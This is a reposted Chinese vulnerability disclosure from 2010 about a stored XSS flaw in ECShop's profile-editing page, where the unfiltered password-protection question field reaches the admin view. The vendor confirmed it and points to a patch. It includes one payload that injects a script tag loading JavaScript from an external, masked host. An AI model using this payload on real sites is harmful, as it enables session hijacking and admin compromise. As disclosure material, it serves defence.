来源:自学PHP网 时间:2015-04-17 15:08 作者: 阅读:次
[导读] 简要描述:个人资料修改时,Javascript代码过滤不够严格,XSS代码直接进入数据库详细说明:密码保护问题这一项,没有使用正则过滤,其他的的都有正则过滤。我们可以在密码保护问题...
简要描述:个人资料修改时,Javascript代码过滤不够严格,XSS代码直接进入数据库 详细说明:密码保护问题这一项,没有使用正则过滤,其他的的都有正则过滤。我们可以在密码保护问题里输入XSS,但是后台查看会员资料是不显示密码保护问题的,所以这里必须要网站后台添加了新的 “会员注册项”时,后台查看资料就会显示了,此处填入一段引入外部js的代码:"><script src="http://www.***.com/test.js" type="text/javascript"></script> 漏洞证明:修复方案:程序的504行
漏洞回应厂商回应:危害等级:中 漏洞Rank:8 确认时间:2010-09-21 厂商回复:已经确认,补丁稍后放出。 最新状态:2010-09-25:补丁下载地址 http://bbs.ecshop.com/thread-138506-1-1.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com